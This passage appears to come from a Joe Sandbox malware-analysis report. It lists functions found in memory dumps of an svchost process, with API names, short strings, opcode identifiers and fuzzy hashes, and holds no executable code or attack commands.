                                                                                Function 00000195DD5C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                                Function 00000195DD5CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                                Function 00000195DD5C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                                Function 00000195DD5C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                                Function 00000195DD5C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction ID: b6a9a57366d7e32ba7d8204e1a09c4ae5b67336b6113bd5d1bf03962d45849d0
                                                                                • Opcode Fuzzy Hash: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
                                                                                • Instruction Fuzzy Hash: FD51E732703A088AEB16CF59E469BD837D7F34AB89F518124DA06A3B8CDB75C841CB44
                                                                                Function 00000195DD5C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 3343c703fad3ff3a8a0055ce76d4c8b5bb2113134d4bfc35ff936db91a6087cf
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 3931D132202A44C6E716DF5AE86879937E6F745BCAF058014EE46A7B8DDB39C941CB04
                                                                                Function 00000195DD5C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: df346fd54c246db8dc1c541bbdd1f0d6174768352badab0d676f886130502b32
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 2BF04432304A4592E7618BA5F8A479967E2F748BD8F844021DA4957E54DF3CC64ECB10
                                                                                Function 00000195DD5C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 9bf27a7e66860d5ed9a1e4fc62765c01fea6d54f0cf7a99623ebd25812deed3f
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: FFF01C75715F8882FB158F97B92419967E2AB48FD1F089131EE4A67F28DF3CC4868710
                                                                                Function 00000195DD5CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: 6fff49532d995f645c10438cf692a88e56ff7661239a114b43dcc12d8e254882
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 9BF09675311F0981EF118BA8E46439963E2EB857A1F540219CA6A56BE4DF3CC546C310
                                                                                Function 00000195DD5C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: a3c0edd0877988b553c5cb3f44ac1cf59b63286ea202ec1d8159712ba189bc8b
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 7402A83221AB8486E761CB99E4A479EB7E1F3C4794F104115EA8E97FA9DF7CC484CB00
                                                                                Function 00000195DD5C5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: c54ef34d66bd00901bd8adbac774be78d0448155a515a9e92ef6434a46babdc8
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 5561EB3661AF48C6E761DB9AE46475AB7E2F388784F500115EA8E97FA8DB7CC440CF40
                                                                                Function 00000195DD5D4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 4f18cf734432864d1cadb05385a9f61388192ac32121d651ae8f93e19ceaa8fb
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 38115132A10F9131FB6615E8D4763E611DB6B683F8F180724A97636FD68A24C8414721
                                                                                Function 00000195DD5A3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 33dfdcfffdc3893784a7b309723e3667eaa1db39b5b3fd1c14ced88943099ce3
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 0111E332A10F3141FBA691ECE4753E91AC36F5C37CF49A638A96626ED6CA2CF8405700
                                                                                Function 00000195DD59F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: e363e31868ba0ebea0856da9f2af10226048556fbf55e11a4800ee541c068533
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 3261D53A600E40C2FB6BCBE4E9703EE2AE3E785780F554415CA5A37FA4DB34D8499B40
                                                                                Function 00000195DD5CAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                                • Instruction ID: 14cf2eee4fbcc911eae32f8475549afe507b7b7c46814838016a04d8a23f088c
                                                                                • Opcode Fuzzy Hash: 10fc382da7d13d8ad43a4db652bb922ee3acc66b14bf34360ded925820cce3ee
                                                                                • Instruction Fuzzy Hash: DD614932602A888AEB21DFA9D4503DD7BE2F354B8CF045215EF4967B98DB39D595C700
                                                                                Function 00000195DD5CAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 2a90534c08ec7fa08356974faa6f23fad74bcd69915b4cf882117b33a0582183
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: A451E076101B88CAEB768FA994A43D87BE2F355B85F184116DA89E7FD5CB39C490CB00
                                                                                Function 00000195DD59A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                                Function 00000195DD598405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                                Function 00000195DD5983E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                                Function 00000195DD5D2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                                • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                                Function 00000195DD5C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                                Function 00000195DD5D2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                                • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                                Function 00000195DD5C7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                                Function 00000195DD5C253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                                • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                                Function 00000195DD599E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                                Function 00000195DD5C2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                                • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                                Function 00000195DD5D26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                                Function 00000195DD5C94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
